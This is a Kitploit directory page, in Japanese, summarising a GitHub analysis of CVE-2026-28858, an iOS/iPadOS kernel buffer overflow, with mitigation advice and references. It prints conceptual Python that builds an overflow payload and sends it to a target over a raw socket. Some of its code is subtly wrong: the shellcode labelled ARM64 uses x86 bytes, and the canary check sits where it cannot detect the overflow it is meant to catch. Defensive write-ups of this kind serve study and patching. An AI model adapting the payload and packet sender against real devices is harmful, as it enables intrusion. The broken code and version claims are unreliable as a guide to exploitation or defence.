Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-28858 — CVE-2026-28858の技術的分析。Apple iOS/iPadOSカーネルにおける重大なバッファオーバーフローについて、エクスプロイトの流れ、緩和策、防御的なコーディング例を含む。 | Kitploit
ツール/GitHubGitHub/kaleth4/cve-2026-28858
iOSセキュリティ脆弱性分析エクスプロイトモバイルセキュリティ学習と教育バイナリエクスプロイト
GitHubkaleth4/cve-2026-28858

CVE-2026-28858

CVE-2026-28858の技術的分析。Apple iOS/iPadOSカーネルにおける重大なバッファオーバーフローについて、エクスプロイトの流れ、緩和策、防御的なコーディング例を含む。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2026-28858 — Apple iOS/iPadOS におけるバッファオーバーフロー

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  重大度: 緊急  │  CVSS: 9.8  │  CWE-120  │  リモート   ║
╚══════════════════════════════════════════════════════════════╝

リモートのユーザーは、ユーザーの操作や特権を必要とせずに、iOS/iPadOS でシステムの予期しない終了やカーネルメモリの破損を引き起こす可能性があります。


📋 技術情報

フィールド値
CVE IDCVE-2026-28858
EUVDEUVD-2026-15131
公開日2026年3月25日
最終更新日2026年3月26日
CVSS v3.19.8 / 10 — 緊急
EPSS0.05%
ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-120 — サイズ検証なしのバッファコピー
ステータス分析済み — パッチ利用可能

🎯 説明

Apple iOS および iPadOS におけるバッファオーバーフロー。カーネル入力処理における境界チェックの不備が原因です。

実際の影響:

  • サービス拒否(システムクラッシュ)
  • カーネルメモリの破損
  • カーネル権限での任意コード実行の可能性
  • ゼロクリック: ユーザーの操作を必要としない

⚡ 攻撃ベクターの詳細


🔬 技術分析とコード例

CVE-2026-28858 に対する公開エクスプロイトは存在しません。以下の表現は、CWE-120 と文書化された攻撃ベクターに基づく概念的なものです。

1. ペイロード構造(オーバーフロー)

root@kitploit:~
# オーバーフローの概念的な表現
import socket

# 1. 割り当てられたバッファの埋め込み(カーネルハンドラでは通常約512バイト)
buffer_fill = b"A" * 512

# 2. 上書きされたリターンアドレス — 攻撃者が制御する領域を指す
# 実際の iOS/iPadOS では: ASLR + PAC(ポインタ認証コード)のバイパスが必要
return_address = b"\x41\x42\x43\x44"

# 3. シェルコード: NOPスレッド + ARM64 用の悪意のある命令
shellcode = b"\x90" * 16 + b"\xeb\x12..."  # NOPスレッド + ペイロード

payload = buffer_fill + return_address + shellcode

2. 配信ベクター(ゼロクリック)

root@kitploit:~
# ユーザーの操作なしでのリモート配信
# 例: 操作された長さフィールドを持つネットワークパケット

import struct

def craft_malicious_packet(target_ip: str, target_port: int):
    """
    iOS カーネルがバックグラウンドで処理する(ユーザーUIなし)
    不正なメタデータを持つパケットを作成します。
    例: TLS証明書、画像メタデータ、ネットワークプロトコルフィールド。
    """
    # プロトコルの正当なヘッダー
    header = struct.pack(">HH", 0x0001, 0xFFFF)  # type=1, length=OVERFLOW

    # カーネルバッファを超えるペイロード
    malicious_data = header + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
        s.sendto(malicious_data, (target_ip, target_port))

3. カーネルでの実行(エクスプロイトの流れ)

root@kitploit:~
[ネットワーク/WiFi/BT] → 不正なパケット
      ↓
[バックグラウンドのiOSプロセス] → "長さ"フィールド = 0xFFFF を読み取る
      ↓
[memcpy(カーネルバッファ, データ, 0xFFFF)] → 境界チェックなし
      ↓
[オーバーフロー: シェルコードがカーネルのスタック/ヒープに書き込まれる]
      ↓
[プロセッサが攻撃者の return_address にリダイレクトされる]
      ↓
[ring 0 / カーネル権限で実行]

4. 脆弱なコード vs. 修正済みコード

root@kitploit:~
/* ❌ 脆弱なコード(パッチ適用前) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];
    memcpy(bufer_kernel, datos_usuario, longitud); // 検証なし
}

/* ✅ 修正済みコード(iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];

    // 境界チェック — Apple が適用した修正
    if (longitud > sizeof(bufer_kernel)) {
        kernel_log("CVE-2026-28858: input truncado [%zu > 512]", longitud);
        return; // コピー前に中止
    }

    memcpy(bufer_kernel, datos_usuario, longitud);
}

5. スタックカナリアによる検出

root@kitploit:~
/* 多層防御メカニズム: スタックカナリア */
#include <string.h>

#define CANARY_VALUE 0xDEADBEEFCAFEBABE

void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
    uint64_t canary = CANARY_VALUE;
    char bufer_seguro[512];

    if (longitud > sizeof(bufer_seguro)) {
        log_security_event("Intento de desbordamiento bloqueado");
        return;
    }

    memcpy(bufer_seguro, datos_usuario, longitud);

    // コピー後のカナリアの整合性を検証
    if (canary != CANARY_VALUE) {
        panic("Stack smashing detectado — CVE-2026-28858");
    }
}

🛡️ 緩和策

直ちに必要な対応:

root@kitploit:~
iOS 26.4 / iPadOS 26.4 以降に更新
  • 設定 → 一般 → ソフトウェア・アップデート
  • 26.4 より前のバージョンのすべての Apple デバイスに適用
  • 有効な回避策は存在しない — パッチのみが有効

📅 タイムライン

root@kitploit:~
2026年3月23日  → 初回公開(EUVD)
2026年3月24日  → Apple アドバイザリ #126792 公開
2026年3月24日  → 最初の言及を検出(Feedly)
2026年3月24日  → 自動分析による CVSS 推定
2026年3月25日  → NVD が CVSS 9.8 — 緊急 を割り当て
2026年3月25日  → Qualys に検出を追加(ID: 610773)
2026年3月26日  → ステータス: 分析済み

🖥️ 影響を受けるシステム

26.4 より前のすべての iOS および iPadOS バージョン、以下を含む:

  • iOS 1.0 → 26.3.x
  • iPadOS 12.1 → 26.3.x

影響を受ける CPE の完全なリストは、参照ドキュメントを参照してください。


🔗 参照

ソースURL
Apple セキュリティアドバイザリhttps://support.apple.com/en-us/126792
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-28858
CWE-120https://cwe.mitre.org/data/definitions/120.html

⚠️ 関連する CAPEC 分類

  • CAPEC-100 — バッファオーバーフロー
  • CAPEC-10 — 環境変数を介したオーバーフロー
  • CAPEC-14 — クライアントサイドインジェクションによるバッファオーバーフロー
  • CAPEC-8 — API 呼び出しにおけるバッファオーバーフロー
  • CAPEC-92 — 強制整数オーバーフロー

免責事項: 提示されたコードは、教育および防御的研究目的のための概念的な表現にすぎません。CVE-2026-28858 に対する公開エクスプロイトは存在しません。

ツールをダウンロード
パラメータ値説明
攻撃ベクターネットワークリモートから悪用可能
攻撃の複雑さ低特別な条件は不要
必要な特権なし認証は不要
ユーザー操作なしゼロクリック
スコープ変更なし脆弱なコンポーネントに限定
機密性高データへの完全なアクセス
完全性高完全な改ざんが可能
可用性高システムクラッシュ